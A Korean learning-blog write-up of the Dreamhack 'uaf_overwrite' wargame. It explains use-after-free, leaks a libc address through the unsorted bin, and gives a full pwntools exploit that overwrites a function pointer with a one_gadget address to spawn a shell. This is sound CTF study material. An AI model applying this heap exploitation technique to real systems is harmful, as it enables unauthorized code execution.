TIL: Use After Free 😇

Use After Free

Use-After-Free는 memory reference를 위해 사용한 pointer를 memory 해제 후에 초기화하지 않아서, 또는 해제한 memory를 초기화하지 않고 다음 chunk에 re-allocate해서 생기는 취약점이다.

malloc과 free는 allocate하거나 free한 memory의 데이터를 초기화하지 않는다. → 새롭게 할당한 chunk에 이전에 free한 chunk의 data가 남아있어 유출될 수 있다.

ptmalloc2는 새로운 allocate 요청이 들어왔을 때 요청된 크기와 비슷한 chunk가 bin이나 tcache에 있는지 확인하고, 만약 있다면 해당 chunk를 재사용한다. → 앞서 free한 memory와 같은 size로 memory를 allocate할 때 이전의 값이 그대로 남아있을 수 있다.

Wargame: uaf_overwrite

문제의 소스 코드는 아래와 같다.

// Name: uaf_overwrite.c
// Compile: gcc -o uaf_overwrite uaf_overwrite.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

struct Human {
  char name[16];
  int weight;
  long age;
};

struct Robot {
  char name[16];
  int weight;
  void (*fptr)();
};

struct Human *human;
struct Robot *robot;
char *custom[10];
int c_idx;

void print_name() { printf("Name: %s\n", robot->name); }

void menu() {
  printf("1. Human\n");
  printf("2. Robot\n");
  printf("3. Custom\n");
  printf("> ");
}

void human_func() {
  int sel;
  human = (struct Human *)malloc(sizeof(struct Human));

  strcpy(human->name, "Human");
  printf("Human Weight: ");
  scanf("%d", &human->weight);

  printf("Human Age: ");
  scanf("%ld", &human->age);

  free(human);
}

void robot_func() {
  int sel;
  robot = (struct Robot *)malloc(sizeof(struct Robot));

  strcpy(robot->name, "Robot");
  printf("Robot Weight: ");
  scanf("%d", &robot->weight);

  if (robot->fptr)
    robot->fptr();
  else
    robot->fptr = print_name;

  robot->fptr(robot);

  free(robot);
}

int custom_func() {
  unsigned int size;
  unsigned int idx;
  if (c_idx > 9) {
    printf("Custom FULL!!\n");
    return 0;
  }

  printf("Size: ");
  scanf("%d", &size);

  if (size >= 0x100) {
    custom[c_idx] = malloc(size);
    printf("Data: ");
    read(0, custom[c_idx], size - 1);

    printf("Data: %s\n", custom[c_idx]);

    printf("Free idx: ");
    scanf("%d", &idx);

    if (idx < 10 && custom[idx]) {
      free(custom[idx]);
      custom[idx] = NULL;
    }
  }

  c_idx++;
}

int main() {
  int idx;
  char *ptr;

  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);

  while (1) {
    menu();
    scanf("%d", &idx);
    switch (idx) {
      case 1:
        human_func();
        break;
      case 2:
        robot_func();
        break;
      case 3:
        custom_func();
        break;
    }
  }
}

Vulnerability Scanning

• checksec

  

  모든 보호 기법이 적용되어 있다.

• Human과 Robot의 크기가 동일하며, 두 struct 모두 각각 human_func(), robot_func()에 의해 allocate 및 free될 수 있다. → Use-After-Free 버그가 발생할 수 있다.
  • 특히 robot_func()에서 Robot의 fptr를 call하는데, 이때 Use-After-Free 버그를 이용해 fptr의 값을 조작할 수 있으므로 원하는 함수를 실행할 수 있다. → one_gadget을 활용하자.
• one_gadget의 주소를 구하기 위해 code base를 구해야 하는데, 이때 custom_func를 활용한다. custom_func를 통해 0x100 이상의 크기의 chunk를 allocate 및 free할 수 있으므로 이 함수에서도 Use-After-Free 버그가 발생한다.

Code base 구하기

https://learn.dreamhack.io/119#5

https://velog.io/@woounnan/SYSTEM-Heap-Basics-Bin#종류

Code base를 구하기 위해 unsorted bin의 특징을 활용한다.

• Unsorted bin에 처음 연결되는 chunk는 libc의 특정 주소와 이중 원형 linked list를 형성한다. ( = 첫 번째 chunk의 fd, bk에는 libc 내부의 주소가 들어있다.) → unsorted bin에 연결된 chunk를 re-allocate하고, fd나 bk의 값을 읽으면 libc가 mapping된 주소를 계산할 수 있다.
• 0x410 이하의 크기의 chunk는 tcache에 먼저 삽입되므로 이보다 큰 chunk를 해제해서 unsorted bin에 연결하고, 이를 재할당해서 값을 읽어 libc가 mapping된 주소를 확인하자.
• Free할 chunk가 top chunk와 맞닿아 있을 경우 free할 때 두 chunk가 coalesce되므로 chunk 두 개를 연속으로 allocate하고, 첫 번째로 allocate한 chunk를 free해야 한다.

이제 실제로 libc_base를 찾고, one_gadget의 주소를 얻자.

• libc에 mapping된 주소 구하기

앞서 언급했듯이 두 개의 chunk를 allocate하고, 첫 번째로 allocate한 chunk를 free한다. 이후 같은 size의 chunk를 다시 allocate한 뒤 fd나 bk의 값을 확인한다. 세 번의 custom 실행으로 값을 확인할 수 있다.

gdb를 이용해 세 번째 custom 함수의 실행 전의 fd의 값을 확인하면 아래와 같이 0x7fd5db35dca0임을 확인할 수 있다. (gdb의 heap command를 사용)

• 그 주소가 어느 곳의 주소인지 확인하기

gdb로 이 주소가 libc 중 어느 곳의 주소인지를 확인하면 아래와 같이 main_arena+96의 주소임을 확인할 수 있다.

• 주어진 version의 libc에서 offset 확인하기

https://d41jung0d.tistory.com/114

주어진 version의 libc의 offset을 확인하기 위해 main_arena symbol을 libc에서 찾아보았지만, 찾을 수 없었다.

검색을 통해 main_arena는 __malloc_hook + 0x10에 위치한다는 사실을 알 수 있었으므로 libc.rip에서 주어진 libc의 __malloc_hook의 offset을 확인하고, 이 값에 0x10을 더해주면 된다. (추가로 main_arena는 64 bit machine에서는 __malloc_hook + 0x10에, 32 bit machine에서는 __malloc_hook + 0x18에 위치한다.)

문제에서 주어진 libc에서는 __malloc_hook의 offset이 0x3ebc30이므로 main_arena의 offset은 0x3ebc40임을 알 수 있다.

• overwrite된 부분 고려하기

그런데 이때 세 번째 custom 함수를 실행할 때 "B"을 data로 입력하기 때문에 fd의 마지막 한 바이트가 0x42로 overwrite되게 된다. 따라서 printf로 출력되는 값은 0x7fd5db35dc42가 된다. libc에 mapping된 주소는 하위 1.5 byte가 일정하므로, 0x42 - 0xa0만큼 값이 더해졌다고 생각하면 된다.

• libc_base 구하기

출력값이 나오기 위한 과정을 되돌아보면 아래와 같이 정리할 수 있다:

출력값 = libc_base + 0x3ebc40 + 96 - 0xa0 + 0x42

따라서 libc_base = 출력값 - 0x3ebc40 - 96 + 0xa0 - 0x42 = 출력값 - 0x3ebc42

따라서 아래와 같이 exploit하면 libc_base를 구할 수 있고, 이로부터 one_gadget의 주소도 구할 수 있다. one_gadget의 offset은 one_gadget을 이용해 구했다.

from pwn import *
p = process("./uaf_overwrite")

def custom(size, data, idx):
    p.sendlineafter(">", "3")
    p.sendlineafter(": ", str(size))
    p.sendafter(": ", data)
    p.sendlineafter(": ", str(idx))

custom(0x500, "AAAA", -1)
custom(0x500, "AAAA", 0)
custom(0x500, "B", -1)
libc_base = u64(p.recvline()[:-1].ljust(8, b"\x00")) - 0x3ebc42
og = libc_base + 0x10a41c

Exploit

from pwn import *

p = remote("host3.dreamhack.games", 15336)

def human(weight, age):
    p.sendlineafter(">", "1")
    p.sendlineafter(": ", str(weight))
    p.sendlineafter(": ", str(age))

def robot(weight):
    p.sendlineafter(">", "2")
    p.sendlineafter(": ", str(weight))

def custom(size, data, idx):
    p.sendlineafter(">", "3")
    p.sendlineafter(": ", str(size))
    p.sendafter(": ", data)
    p.sendlineafter(": ", str(idx))

custom(0x500, "AAAA", -1)
custom(0x500, "AAAA", 0)
custom(0x500, "B", -1)

# local, remote:
libc_base = u64(p.recvline()[:-1].ljust(8, b"\x00")) - 0x3ebc42
# remote:
og = libc_base + 0x10a41c
# local:
#og = libc_base + 0x10a2fc
print("libc_base: ", hex(libc_base))
print("og: ", hex(og))

human("1", og)
robot("1")

p.interactive()

• one_gadget의 주소를 human_func를 이용해 human의 age에 넣는다. human이 free되어도 이 값은 남아 있으므로 (Use-After-Free) robot_func를 실행했을 때 one_gadget이 실행된다.

아직 완전히 이해하지 못한 점들

• heap에 대해 깊게 공부한 적이 없어 unsorted bin, tcache와 같은 용어들을 처음 들어봤는데, 나중에 시간이 되면 heap에 대해서도 공부해야 함.
• 0x3ebc42라는 offset이 다행히 remote에서도 적용이 되었는데, 만약 적용되지 않았으면 어떻게 구해야 했을지 잘 모르겠음. 문제에서 사용된 버전의 libc 파일이 주어졌을 때, 이 libc 파일에서 원하는 symbol의 offset을 어떻게 구하는건지 잘 모르겠다.